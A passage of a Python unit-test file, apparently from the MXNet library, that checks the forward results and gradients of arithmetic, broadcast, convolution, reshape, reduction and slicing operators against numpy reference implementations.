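        # input, larger in the output), as reduce_op below does.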
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
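    # A unit impulse convolved with an all-ones kernel writes the kernel
    # footprint into the output, so both the output and the input gradient
    # must sum to prod(kernel_shape).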
    assert_allclose(np.sum(out), np.prod(kernel_shape), atol=1e-5)
    assert_allclose(np.sum(vgrad), np.prod(kernel_shape), atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
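    # Shape codes, per the Reshape operator docs: 0 copies the corresponding
    # input dim, -1 infers a single dim, -2 copies all remaining dims, -3 merges
    # two consecutive dims, -4 splits a dim into the two values that follow it;
    # reverse=True matches dims from the right instead of the left.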
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
            # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5.
            # Insert NaNs with probability nan_prob.
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
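    # Each call below pairs a numpy forward reduction with its hand-derived
    # gradient: d(sum)/dx = 1, d(mean)/dx = 1/n, d(prod)/dx = prod/x,
    # NaN entries get zero gradient for nansum/nanprod, max/min route the
    # gradient to the extremal elements, and d(norm)/dx = x/norm for L2.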
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
        # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
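        # Broadcasting's backward pass is a sum-reduction over the broadcast
        # axes; np_reduce(..., np.sum) reproduces that for the ground truth.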
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0].asnumpy(), groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd.asnumpy(), grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
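            # Re-run with grad_req='add' to verify that backward accumulates
            # into an existing gradient buffer instead of overwriting it.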
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
